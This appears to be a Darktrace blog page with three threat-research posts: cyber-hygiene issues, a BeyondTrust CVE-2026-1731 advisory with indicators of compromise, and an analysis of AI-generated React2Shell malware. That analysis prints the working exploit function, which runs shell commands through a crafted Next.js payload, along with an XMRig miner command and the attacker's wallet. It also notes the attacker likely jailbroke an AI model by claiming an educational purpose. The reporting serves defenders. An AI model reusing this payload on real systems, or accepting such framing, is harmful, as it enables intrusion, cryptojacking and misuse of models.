Blog
/
/
May 14, 2019

[Part 1] 10 Cyber Hygiene Issues Leading to a Security Breach

Spotting cyber hygiene issues caused by a lapse of attention requires AI tools that alert critical changes to network activity. Read part one here!
Written by
Max Heinemeyer
Global Field CISO
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Max Heinemeyer
Global Field CISO
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
14
May 2019

For as long as people have sought to protect their assets from intrusion, they have safeguarded those assets behind ever more formidable walls, from castle walls made of stone to firewalls comprised of code. Yet no matter how impenetrable such fortifications appear, motivated attackers will inevitably find a way to bypass them. Build a 50-foot fence, and the enemy will bring a 50-foot ladder. Install state-of-the-art endpoint security on every employee’s computer, and cyber-criminals will infiltrate via the smart refrigerator in the office kitchen.

Needless to say, reinforcing the perimeter is still a good idea. Just as a castle in ruins makes a poor home for a king, so too do weak endpoint defenses put intellectual property and sensitive data at risk. The reality, however, is that digital environments are exponentially more difficult to wall off than physical ones, given the sheer number of applications and users that can compromise an entire network with just a single vulnerability or oversight. Improving a company’s cyber hygiene is therefore a continual responsibility, the nature of which perpetually changes as the business evolves.

Because even flawless cyber hygiene isn’t guaranteed to keep external attackers — let alone malicious insiders — from breaching the perimeter, leading companies and governments have turned to cyber AI technologies. Cyber AI works by learning the particular behaviors of a network and its users, allowing it to pick up on the subtly anomalous activity associated with an already infected device. Such technologies have shined a light on ten of the most commonly exploited cyber hygiene issues, five of which are examined below. And whereas there is no silver bullet when it comes to securing the enterprise online, patching these holes in the perimeter is nevertheless a critical first step.

Issue #1: Using SMBv1 — for anything

Server Message Block (SMB) is a very common application layer protocol that provides shared access to files, printers, and serial ports to devices in a network. The latest version, SMBv3, was developed with security in mind, whereas the original version, SMBv1, is more than three decades old and — in Microsoft’s own words — “was designed for a world that no longer exists[;] a world without malicious actors.” As a result, Microsoft has long implored users to stop using it in the strongest possible terms.

However, many of these users still have not disabled the protocol on operating systems older than Windows 8.1 and Windows Server 2012 R2, which do not allow SMB1 to be removed. The 2017 WannaCry ransomware attack abused the famous exploit EternalBlue in SMBv1 to infect Windows machines and move laterally in Windows environments, precipitating billions of dollars in global losses. Furthermore, SMBv1 allows NTLM logins using the anonymous credential by default, while successful anonymous logins can allow attackers to enumerate the target device for more information.

In light of the serious security risks that SMBv1 introduces, Darktrace flags its usage as threatening with the following models:

  • Anomalous Connection / Unusual SMB Version 1 Connectivity
  • Compliance / SMB Version 1 Usage

Issue #2: SMB services exposed to the internet

As mentioned above, SMB allows devices in a network to communicate with one another for a variety of purposes — functionalities that render it a complex protocol with many known vulnerabilities. Users are consequently highly discouraged from allowing connections from the internet to internal devices via any version of SMB — not just SMBv1.

Darktrace detected this poor hygiene practice in early 2019, when it observed the use of SMB from external IP addresses connecting to an internal device. The device happened to be a Domain Controller (DC), a server which manages network security and is responsible for user authentication. Due to the critical network function performed by this server, it is a high value target for cyber-criminals, meaning that any external connections should be limited to only essential administrative activity. In this incident, the external device was seen accessing the DC via SMBv1 and performing anonymous login. Fortunately, Darktrace AI detected the potential compromise with the model Compliance / External Windows Communications.

Issue #3: RDP services exposed to the internet

Microsoft’s proprietary Remote Desktop Protocol (RDP) provides a remote connection to a network-connected computer, affording users significant control over another device and its resources. Such extensive capabilities represent the holy grail for attackers, whether they seek to gain an initial foothold in the network, access restricted content, or directly drop malware on the controlled computer. Exposing devices with RDP services to the internet therefore creates a significant vulnerability in the network perimeter, as passwords and user credentials are liable to be brute-forced by those with malign intent.

Last month, Darktrace’s cyber AI detected a large number of incoming connections over the RDP protocol to a customer’s internet-facing device — possible indicators of a brute-force attack. While this activity might have been benign under different circumstances, the AI’s understanding of ‘self’ versus ‘not self’ for the particular device in question enabled it to flag the connections as anomalous, since they breached its Compliance / Incoming RDP from Rare Endpoints model.

By investigating further with Darktrace’s device tracking capability, we can see that the computer also breached several other AI models, including Compliance / Crypto Currency Mining Activity, Compliance / Outbound RDP, and Compromise / Beaconing Activity to External Rare. These breaches suggest that the attackers might have sought to use the computer to plant crypto-mining modules on other network-connected devices.

Models that the device breached within three days

Issue #4: Data uploads to unapproved cloud services

No innovation has antiquated the perimeter-only approach to cyber security more than cloud computing, since cloud and hybrid infrastructures have nebulous borders at best. Nevertheless, there are a number of bad cyber hygiene habits that make bypassing perimeter defenses much easier, including employees who upload data to close storage providers that are not on an organization’s approved list. Whether done maliciously or inadvertently, this decision prevents organizations from gaining any visibility over that data being transferred across the globe.

Darktrace cyber AI detects such unauthorized data movements with the following models:

  • Anomalous Connection / Data Sent To New External Device
  • Unusual Activity / Unusual External Data Transfer

Issue #5: Weak password usage and storage

Among the most common and most avoidable cyber-attacks are those that exploit systems with weak passwords, which can be breached by brute-force or dictionary attacks. Yet stronger, more complex passwords introduce a separate problem: because they are harder to be remember, users tend to store these passwords in sometimes unsafe locations. Whereas passwords housed in encrypted mediums such as password managers are relatively secure, many users instead save them in cleartext. Several modern strains of malware possess the ability to comb through the network in search of possible files which contains passwords, rendering this a critical vulnerability.

Darktrace has a set of models to spot such attempts at password guessing:

  • Device / SMB Session Bruteforce
  • Unusual Activity / Large Volume of Kerberos Failures
  • User / Kerberos Password Bruteforce
  • SaaS / Login Bruteforce Attempt

Darktrace also has a set of models that flag anomalous password storage or access:

  • Compliance / Sensitive Terms in Unusual SMB Connection
  • Compliance / Possible Unencrypted Password Storage
  • SaaS / Unusual SaaS Sensitive File Access

Read the second part: Part two — The perils of convenience

Written by
Max Heinemeyer
Global Field CISO
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Max Heinemeyer
Global Field CISO

CVE-2026-1731: How Darktrace Sees the BeyondTrust Exploitation Wave Unfolding

February 13, 2026
Emma Foulger
Global Threat Research Operations Lead
Watch the NIS2 Webinar
Trending blogs
1
Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD
Nov 19, 2025
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
Continue reading
No items found.

Blog

/

/

February 13, 2026

CVE-2026-1731: How Darktrace Sees the BeyondTrust Exploitation Wave Unfolding

Default blog imageDefault blog image

Note: Darktrace's Threat Research team is publishing now to help defenders. We will update continue updating this blog as our investigations unfold.

Background

On February 6, 2026, the Identity & Access Management solution BeyondTrust announced patches for a vulnerability, CVE-2026-1731, which enables unauthenticated remote code execution using specially crafted requests.  This vulnerability affects BeyondTrust Remote Support (RS) and particular older versions of Privileged Remote Access (PRA) [1].

A Proof of Concept (PoC) exploit for this vulnerability was released publicly on February 10, and open-source intelligence (OSINT) reported exploitation attempts within 24 hours [2].

Previous intrusions against Beyond Trust technology have been cited as being affiliated with nation-state attacks, including a 2024 breach targeting the U.S. Treasury Department. This incident led to subsequent emergency directives from  the Cybersecurity and Infrastructure Security Agency (CISA) and later showed attackers had chained previously unknown vulnerabilities to achieve their goals [3].

Additionally, there appears to be infrastructure overlap with React2Shell mass exploitation previously observed by Darktrace, with command-and-control (C2) domain  avg.domaininfo[.]top seen in potential post-exploitation activity for BeyondTrust, as well as in a React2Shell exploitation case involving possible EtherRAT deployment.

Darktrace Detections

Darktrace’s Threat Research team has identified highly anomalous activity across several customers that may relate to exploitation of BeyondTrust since February 10, 2026. Observed activities include:

-              Outbound connections and DNS requests for endpoints associated with Out-of-Band Application Security Testing; these services are commonly abused by threat actors for exploit validation.  Associated Darktrace models include:

o    Compromise / Possible Tunnelling to Bin Services

-              Suspicious executable file downloads. Associated Darktrace models include:

o    Anomalous File / EXE from Rare External Location

-              Outbound beaconing to rare domains. Associated Darktrace models include:

o   Compromise / Agent Beacon (Medium Period)

o   Compromise / Agent Beacon (Long Period)

o   Compromise / Sustained TCP Beaconing Activity To Rare Endpoint

o   Compromise / Beacon to Young Endpoint

o   Anomalous Server Activity / Rare External from Server

o   Compromise / SSL Beaconing to Rare Destination

-              Unusual cryptocurrency mining activity. Associated Darktrace models include:

o   Compromise / Monero Mining

o   Compromise / High Priority Crypto Currency Mining

And model alerts for:

o    Compromise / Rare Domain Pointing to Internal IP

IT Defenders: As part of best practices, we highly recommend employing an automated containment solution in your environment. For Darktrace customers, please ensure that Autonomous Response is configured correctly. More guidance regarding this activity and suggested actions can be found in the Darktrace Customer Portal.  

Appendices

Potential indicators of post-exploitation behavior:

·      217.76.57[.]78 – IP address - Likely C2 server

·      hXXp://217.76.57[.]78:8009/index.js - URL -  Likely payload

·      b6a15e1f2f3e1f651a5ad4a18ce39d411d385ac7  - SHA1 - Likely payload

·      195.154.119[.]194 – IP address – Likely C2 server

·      hXXp://195.154.119[.]194/index.js - URL – Likely payload

·      avg.domaininfo[.]top – Hostname – Likely C2 server

·      104.234.174[.]5 – IP address - Possible C2 server

·      35da45aeca4701764eb49185b11ef23432f7162a – SHA1 – Possible payload

·      hXXp://134.122.13[.]34:8979/c - URL – Possible payload

·      134.122.13[.]34 – IP address – Possible C2 server

·      28df16894a6732919c650cc5a3de94e434a81d80 - SHA1 - Possible payload

References:

1.        https://nvd.nist.gov/vuln/detail/CVE-2026-1731

2.        https://www.securityweek.com/beyondtrust-vulnerability-targeted-by-hackers-within-24-hours-of-poc-release/

3.        https://www.rapid7.com/blog/post/etr-cve-2026-1731-critical-unauthenticated-remote-code-execution-rce-beyondtrust-remote-support-rs-privileged-remote-access-pra/

Continue reading
About the author
Emma Foulger
Global Threat Research Operations Lead

Blog

/

Network

/

February 10, 2026

AI/LLM-Generated Malware Used to Exploit React2Shell

AI/LLM-Generated Malware Used to Exploit React2ShellDefault blog imageDefault blog image

Introduction

To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.

A recently observed intrusion against Darktrace’s Cloudypots environment revealed a fully AI‑generated malware sample exploiting CVE-2025-55182, also known as React2Shell. As AI‑assisted software development (“vibecoding”) becomes more widespread, attackers are increasingly leveraging large language models to rapidly produce functional tooling. This incident illustrates a broader shift: AI is now enabling even low-skill operators to generate effective exploitation frameworks at speed. This blog examines the attack chain, analyzes the AI-generated payload, and outlines what this evolution means for defenders.

Initial access

The intrusion was observed against the Darktrace Docker honeypot, which intentionally exposes the Docker daemon internet-facing with no authentication. This configuration allows any attacker to discover the daemon and create a container via the Docker API.

The attacker was observed spawning a container named “python-metrics-collector”, configured with a start up command that first installed prerequisite tools including curl, wget, and python 3.

Container spawned with the name ‘python-metrics-collector’.
Figure 1: Container spawned with the name ‘python-metrics-collector’.

Subsequently, it will download a list of required python packages from

  • hxxps://pastebin[.]com/raw/Cce6tjHM,

Finally it will download and run a python script from:

  • hxxps://smplu[.]link/dockerzero.

This link redirects to a GitHub Gist hosted by user “hackedyoulol”, who has since been banned from GitHub at time of writing.

  • hxxps://gist.githubusercontent[.]com/hackedyoulol/141b28863cf639c0a0dd563344101f24/raw/07ddc6bb5edac4e9fe5be96e7ab60eda0f9376c3/gistfile1.txt

Notably the script did not contain a docker spreader – unusual for Docker-focused malware – indicating that propagation was likely handled separately from a centralized spreader server.

Deployed components and execution chain

The downloaded Python payload was the central execution component for the intrusion. Obfuscation by design within the sample was reinforced between the exploitation script and any spreading mechanism. Understanding that docker malware samples typically include their own spreader logic, the omission suggests that the attacker maintained and executed a dedicated spreading tool remotely.

The script begins with a multi-line comment:
"""
   Network Scanner with Exploitation Framework
   Educational/Research Purpose Only
   Docker-compatible: No external dependencies except requests
"""

This is very telling, as the overwhelming majority of samples analysed do not feature this level of commentary in files, as they are often designed to be intentionally difficult to understand to hinder analysis. Quick scripts written by human operators generally prioritize speed and functionality over clarity. LLMs on the other hand will document all code with comments very thoroughly by design, a pattern we see repeated throughout the sample.  Further, AI will refuse to generate malware as part of its safeguards.

The presence of the phrase “Educational/Research Purpose Only” additionally suggests that the attacker likely jailbroke an AI model by framing the malicious request as educational.

When portions of the script were tested in AI‑detection software, the output further indicated that the code was likely generated by a large language model.

GPTZero AI-detection results indicating that the script was likely generated using an AI model.
Figure 2: GPTZero AI-detection results indicating that the script was likely generated using an AI model.

The script is a well constructed React2Shell exploitation toolkit, which aims to gain remote code execution and deploy a XMRig (Monero) crypto miner. It uses an IP‑generation loop to identify potential targets and executes a crafted exploitation request containing:

  • A deliberately structured Next.js server component payload
  • A chunk designed to force an exception and reveal command output
  • A child process invocation to run arbitrary shell commands

    def execute_rce_command(base_url, command, timeout=120):  
    """ ACTUAL EXPLOIT METHOD - Next.js React Server Component RCE
    DO NOT MODIFY THIS FUNCTION
    Returns: (success, output)  
    """  
    try: # Disable SSL warnings     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

 crafted_chunk = {
      "then": "$1:__proto__:then",
      "status": "resolved_model",
      "reason": -1,
      "value": '{"then": "$B0"}',
      "_response": {
          "_prefix": f"var res = process.mainModule.require('child_process').execSync('{command}', {{encoding: 'utf8', maxBuffer: 50 * 1024 * 1024, stdio: ['pipe', 'pipe', 'pipe']}}).toString(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
          "_formData": {
              "get": "$1:constructor:constructor",
          },
      },
  }

  files = {
      "0": (None, json.dumps(crafted_chunk)),
      "1": (None, '"$@0"'),
  }

  headers = {"Next-Action": "x"}

  res = requests.post(base_url, files=files, headers=headers, timeout=timeout, verify=False)

This function is initially invoked with ‘whoami’ to determine if the host is vulnerable, before using wget to download XMRig from its GitHub repository and invoking it with a configured mining pool and wallet address.

]\

WALLET = "45FizYc8eAcMAQetBjVCyeAs8M2ausJpUMLRGCGgLPEuJohTKeamMk6jVFRpX4x2MXHrJxwFdm3iPDufdSRv2agC5XjykhA"
XMRIG_VERSION = "6.21.0"
POOL_PORT_443 = "pool.supportxmr.com:443"
...
print_colored(f"[EXPLOIT] Starting miner on {identifier} (port 443)...", 'cyan')  
miner_cmd = f"nohup xmrig-{XMRIG_VERSION}/xmrig -o {POOL_PORT_443} -u {WALLET} -p {worker_name} --tls -B >/dev/null 2>&1 &"

success, _ = execute_rce_command(base_url, miner_cmd, timeout=10)

Many attackers do not realise that while Monero uses an opaque blockchain (so transactions cannot be traced and wallet balances cannot be viewed), mining pools such as supportxmr will publish statistics for each wallet address that are publicly available. This makes it trivial to track the success of the campaign and the earnings of the attacker.

The supportxmr mining pool overview for the attackers wallet address
Figure 3: The supportxmr mining pool overview for the attackers wallet address

Based on this information we can determine the attacker has made approx 0.015 XMR total since the beginning of this campaign, which as of writing is valued at £5. Per day, the attacker is generating 0.004 XMR, which is £1.33 as of writing. The worker count is 91, meaning that 91 hosts have been infected by this sample.

Conclusion

While the amount of money generated by the attacker in this case is relatively low, and cryptomining is far from a new technique, this campaign is proof that AI based LLMs have made cybercrime more accessible than ever. A single prompting session with a model was sufficient for this attacker to generate a functioning exploit framework and compromise more than ninety hosts, demonstrating that the operational value of AI for adversaries should not be underestimated.

CISOs and SOC leaders should treat this event as a preview of the near future. Threat actors can now generate custom malware on demand, modify exploits instantly, and automate every stage of compromise. Defenders must prioritize rapid patching, continuous attack surface monitoring, and behavioral detection approaches. AI‑generated malware is no longer theoretical — it is operational, scalable, and accessible to anyone.

Analyst commentary

It is worth noting that the downloaded script does not appear to include a Docker spreader, meaning the malware will not replicate to other victims from an infected host. This is uncommon for Docker malware, based on other samples analyzed by Darktrace researchers. This indicates that there is a separate script responsible for spreading, likely deployed by the attacker from a central spreader server. This theory is supported by the fact that the IP that initiated the connection, 49[.]36.33.11, is registered to a residential ISP in India. While it is possible the attacker is using a residential proxy server to cover their tracks, it is also plausible that they are running the spreading script from their home computer. However, this should not be taken as confirmed attribution.

Credit to Nathaniel Bill (Malware Research Engineer), Nathaniel Jones ( VP Threat Research | Field CISO AI Security)

Edited by Ryan Traill (Analyst Content Lead)

Indicators of Compromise (IoCs)

Spreader IP - 49[.]36.33.11
Malware host domain - smplu[.]link
Hash - 594ba70692730a7086ca0ce21ef37ebfc0fd1b0920e72ae23eff00935c48f15b
Hash 2 - d57dda6d9f9ab459ef5cc5105551f5c2061979f082e0c662f68e8c4c343d667d

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer
Your data. Our AI.
Elevate your network security with Darktrace AI